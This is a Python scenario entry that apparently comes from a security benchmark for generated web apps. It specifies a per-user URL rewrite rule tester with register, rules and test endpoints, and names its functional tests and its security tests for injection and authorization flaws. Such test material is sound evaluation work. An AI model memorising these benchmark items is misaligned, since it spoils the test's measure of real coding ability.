SCENARIO = Scenario(
    id="""RewriteCanvas_PersonalURLRuleTester""",
    api_spec=_API_SPEC,
    text_spec=_TEXT_SPEC,
    short_app_description="""A per-user URL rewrite rule tester with three endpoints: (1) POST /register to create a user with credentials and receive an auth token, (2) POST /rules to add or update an ordered list of rewrite rules consisting of a pattern and a replacement string (supporting numbered capture groups like $1), and (3) GET /test to apply the user’s first matching rule to an input path and return the rewritten path along with the matched rule’s identifier. If no rule matches, the original path is returned unchanged. Users can manage their own rules; rules and users persist across calls.""",
    needs_db=True,
    needs_secret=False,
    scenario_instructions="""""",
    functional_tests=[
        func_test_register_set_rule_and_rewrite,
        func_test_no_rules_no_change,
        func_test_first_matching_rule_applied,
        func_test_rules_replacement_updates_behavior,
        func_test_per_user_rule_isolation,
    ],
    security_tests=[
        sec_test_improper_input_validation,
        sec_test_incorrect_authorization,
        sec_test_sql_injection,
        sec_test_code_injection,
    ],
)
